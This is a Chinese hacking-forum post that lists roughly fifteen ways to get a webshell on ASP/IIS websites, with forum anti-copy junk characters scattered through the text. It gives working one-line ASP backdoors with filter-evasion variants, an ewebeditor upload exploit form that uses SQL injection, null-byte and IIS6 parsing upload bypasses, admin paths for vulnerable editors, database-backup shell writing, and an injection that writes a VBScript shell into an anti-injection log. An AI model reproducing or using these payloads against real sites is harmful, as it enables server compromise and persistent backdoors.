- 帖子
- 228
- 积分
- 645
- 威望
- 810
- 金钱
- 1192
- 在线时间
- 63 小时
|
1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式
t" W- x* @2 j; D: L8 M, w/ u( z* ?: {/ x: q
2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试<%eval request("value")%>来突破,例如config.asp ?+ P# ` Z/ ~$ y
; }; y4 `' X4 i5 O
3.上传漏洞:& g/ R: X, d% i; o7 e" }
8 W* w9 u% y- y
动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x00
, p7 N) K2 g' u$ v1 C3 v+ Q# U' u4 w; |
逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件
. D5 p+ @5 \- q' U r8 J. c; Y1 u$ c# E5 }7 U2 l
雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp% ]+ s( E( [+ G W
然后在上传文件里面填要传的图片格式的ASP木马# H4 z( Q# _( a' U" j+ {9 Q4 U! l/ c
就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp
) L$ I0 L" f1 n j# p- |. m4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传9 H0 Q8 e: ^$ W
. e& h h+ @2 Y0 |+ X$ t<html>) Y3 X" \* q! f/ l- O9 M4 K
<head>
' K7 ^- T0 C6 ]2 K$ Z9 x. [: S<title>ewebeditor upload.asp上传利用</title>
2 C) ~$ [* X) o$ W/ x/ U</head>2 i& q5 V* L' C: F
<body>
( @+ s7 @1 i3 V$ | X, v0 m% C<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">" r& V" r3 ^+ @1 h1 P- l) u
<input type=file name=uploadfile size=100><br><br># t* P3 a0 w, V% F0 I4 D0 o
<input type=submit value=Fuck>
3 Z% g; ^& B! D& Q9 _3 N% B4 r/ R</form>1 m: r. P' j S# `1 t; w+ [
</body>
; A5 Y) ?$ {; }: [</form>! r# [7 Q4 ?& Z+ z
</html>
' }# F% M! o# I" M) i. N
) f; _5 @$ w+ E2 t7 K5 p6 F2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问4 W* r+ b" r5 |0 u& I/ m
5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
0 I5 s9 x" y6 C2 z0 P/ c7 z; r( O3 H4 I/ B, R
利用windows2003解析。建立zjq.asp的文件夹: V4 U* W! L% d: |
3 j. V3 I, K% R: N7 W# ^$ w3 J6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型
8 @1 h$ c* O* }& p5 d5 m# b1 T0 D
7.cuteeditor:类似ewebeditor
* {" [% J- K" |7 @7 F8 ] u% N& R1 u3 J4 ]! R5 Y4 ~) D
8.htmleditor:同上- `/ ]9 N9 J# j, d6 m$ r0 C+ f
4 `& J6 f5 l0 G$ ~- P
9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破
- S( {' g/ }3 |+ @2 E0 }+ e" a% y5 x$ f* H) a
<%execute request("value")%><%'<% loop <%:%>
1 C: Q% o* i, k. D2 C& T% L/ j) j: f. Z/ }# H$ S/ @
<%'<% loop <%:%><%execute request("value")%>
5 _3 b* E9 \) ~( i7 M6 }2 z7 H
, T% R/ ~8 u( N<%execute request("value")'<% loop <%:%>9 r3 J+ i; G1 V
9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞
+ Z+ I8 Q; i! I- V+ b. }% d. j, T! ?- |/ D; n# A7 r
10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞: E; I/ Q; y: q; l+ u7 Z$ F
7 z: m: G3 _& r. T: O+ b3 V11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3 D/ u7 S6 ?9 R k3 G
& @( H1 c/ v2 Y* `; E: Z解析漏洞得到webshell. R$ w7 U$ X' }, X# c* } H* p
) i" s9 o6 B% z9 V7 \5 L+ H1 _12.mssql差异备份,日志备份,前提需知道web路径
3 w; n! N- N* U9 h0 G! [: }8 ~0 e
- q! @( S3 j2 |13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell
" i% C" a" @' W8 ^ g" W6 w
9 N; f: t2 d) G* B8 K1 R; U1 \14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell
8 S. c! {* F& F! O F; u8 A5 ?) @5 w9 J, U2 p6 G+ K
15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可
5 X& {" u! q" e& e6 q# @; u t9 `: o8 f+ \7 \# t2 _) M
以上只是本人的一些拙见,并不完善,以后想到了再继续添加
5 F: j( n5 K8 {- y6 ]- G9 D/ y不是我原创。我的朋友,飞鸟游鱼原创的 |
-
2
评分人数
-
|